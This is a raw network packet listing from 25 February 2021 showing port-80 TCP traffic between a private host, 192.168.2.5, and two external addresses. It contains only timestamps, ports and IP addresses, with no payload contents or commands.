Feb 25, 2021 11:05:05.463416100 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463426113 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.463439941 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463464022 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463471889 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.463485956 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463496923 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.463509083 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463530064 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.463531971 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463553905 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463576078 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463583946 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.463598967 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463620901 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.464165926 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464195013 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464216948 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464240074 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464251995 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.464267015 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464289904 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464342117 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464343071 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.464349985 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464351892 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464359045 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464376926 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464396954 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464421034 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464441061 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.464443922 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464466095 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464468002 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.464488983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464507103 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.464512110 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464533091 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464548111 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.464555025 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.464601994 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.465090990 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.465117931 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.465141058 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.465162039 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.465184927 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.465207100 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.465231895 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.465233088 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.465254068 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.465255976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.465276957 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.465297937 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.465313911 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.465348005 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472155094 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472182035 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472194910 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472213030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472233057 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472254038 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472275019 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472276926 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472299099 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472321987 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472328901 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472345114 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472367048 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472371101 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472382069 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472389936 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472404957 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472428083 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472449064 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472451925 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472471952 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472489119 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472508907 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472510099 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472531080 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472552061 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472570896 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472572088 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472594976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472604990 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472619057 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472630024 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472640991 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472660065 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472680092 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472697020 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472701073 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472719908 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472723007 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472743034 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472764969 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472784042 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472784996 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472806931 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472821951 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472830057 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472850084 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472852945 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472871065 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472889900 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.472891092 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.472951889 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.473377943 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473411083 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473433018 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473454952 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473474979 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473486900 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.473498106 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473522902 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473541975 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.473545074 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473567009 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473572969 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.473586082 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.473589897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473612070 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473630905 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.473644018 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473661900 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473683119 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473689079 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.473706961 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473728895 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473747969 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473751068 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.473771095 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473787069 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.473793983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.473830938 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.474342108 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474394083 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474412918 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474419117 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.474435091 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474455118 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474456072 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.474482059 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474500895 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.474503994 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474524975 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474545002 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474551916 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.474566936 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474587917 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474595070 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.474611044 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474633932 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474636078 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.474657059 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474678040 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474701881 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474701881 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.474725008 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474733114 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.474749088 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474771976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.474780083 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.474821091 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.475266933 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475292921 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475316048 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475341082 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475366116 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475374937 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.475394964 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475406885 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475414991 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.475430012 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475452900 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475454092 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.475477934 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475498915 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475521088 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475542068 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475543022 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.475564957 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475586891 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475588083 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.475603104 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.475608110 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475631952 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475655079 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475656986 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.475677013 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.475697041 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.476212025 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476244926 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476267099 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476288080 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476306915 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.476306915 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476327896 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476347923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476351976 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.476372004 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476392031 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476412058 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.476414919 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476437092 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476438046 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.476459026 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476478100 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.476480961 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476500034 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476521015 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476531029 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.476542950 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476562023 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476564884 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.476586103 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476605892 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.476607084 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477068901 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477135897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477138996 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477159023 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477180004 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477180958 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477201939 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477221966 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477229118 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477246046 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477266073 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477267981 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477287054 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477308989 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477324963 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477345943 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477566957 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477582932 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477603912 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477622986 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477643013 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477646112 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477664948 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477684975 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477686882 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477706909 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477709055 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477730989 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477751017 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477751970 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477771997 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477791071 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477792978 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477813959 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477833986 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477843046 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477857113 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477874994 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.477884054 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.477920055 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.487873077 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:14.885132074 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:14.938142061 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:14.941132069 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:14.941435099 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:14.994313002 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025151968 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025172949 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025192976 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025202036 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025217056 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025228977 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025240898 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025255919 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025268078 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025279999 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025284052 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.025293112 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025305033 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.025322914 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.025459051 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.026392937 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.026408911 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.026886940 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.027697086 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.027710915 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.028379917 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.029047012 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.029062986 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.029208899 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.030328035 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.030343056 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.030514002 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.031594992 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.031610012 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.032196999 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.032907963 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.032922029 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.034250975 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.034265041 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.034317017 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.034406900 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.035568953 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.035583973 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.036817074 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.036828995 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.036885977 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.041435003 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.078202009 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.078238010 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.078413963 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.078794956 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.078834057 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.078959942 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.080123901 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.080168962 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.080297947 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.081446886 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.082055092 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.082084894 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.083372116 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.083404064 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.083453894 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.084685087 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.084697962 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.084729910 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.084909916 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.085985899 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.086019039 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.086129904 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.087295055 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.087325096 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.088085890 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.088582039 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.088613033 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.089184999 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.089909077 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.089941978 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.091223001 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.091253996 CET	80	49731	104.21.71.230	192.168.2.5
Feb 25, 2021 11:05:15.091310978 CET	49731	80	192.168.2.5	104.21.71.230
Feb 25, 2021 11:05:15.091751099 CET	49731	80	192.168.2.5	104.21.71.230
